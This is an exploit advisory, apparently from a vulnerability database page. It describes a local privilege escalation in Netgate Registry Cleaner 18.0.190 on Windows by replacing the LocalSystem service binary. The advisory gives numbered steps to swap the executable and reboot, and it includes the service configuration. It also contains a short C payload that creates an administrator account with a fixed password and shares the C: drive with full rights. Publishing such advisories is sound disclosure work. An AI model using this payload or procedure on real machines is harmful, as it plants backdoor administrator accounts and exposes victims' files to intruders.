Netgate Registry Clenaner 18.0.190 - Local Privilege Escalation

fr ZwX (FR) fr
Risk: Medium
Local: Yes
Remote: Yes

#--------------------------------------------------------# #Exploit Title: Netgate Registry Clenaner 18.0.190 - Local Privilege Escalation #Exploit Author : ZwX #Exploit Date: 2018-09-09 #Vendor Homepage : #Tested on OS: Windows 7 #Social: #contact: #Website: #--------------------------------------------------------# Product & Service Introduction: =============================== NETGATE Technologies is a security software publisher whose mission is to offer innovative software in the security software market, focusing on the privacy of online users and network security. Whether it's a PC application or a Web application, NETGATE Technologies will only provide you with quality software. Technical Details & Description: ================================ The application suffers from an unquoted search path issue in the official Netgate Registry Clenaner v18.0.190 anti-virus software, causing it to be a potential vector of privilege escalation attack. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. Proof of Concept (PoC): ======================= The issue can be exploited by local attackers with restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the local vulnerability ... 1. Compile the exe (executable) 2. Rename to Test.exe 3. To go from the repertoire C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe 4. Rename RegistryCleanerSrv.exe in RegistryCleanerSrv1.exe 5. Copy Test.exe to C:\Program Files\NETGATE\Registry Cleaner 6. Rename to Test.exe in RegistryCleanerSrv.exe 7. Restart the system 8. Privilege Escalation Succes (Created Administrator Account) -- PoC Exploitation -- SERVICE_NAME: NGRegClnSrv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NETGATE Registry Cleaner Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem -- Code Exploit C -- #include<windows.h> int main(void){ system("net user zwx 123456 /add"); system("net localgroup Administrators zwx /add"); system("net share SHARE_NAME=c: /grant:zwx,full"); return 0; } Disclaimer: =========== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Copyright © 2018 | ZwX - Security Researcher (Software & web application)


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top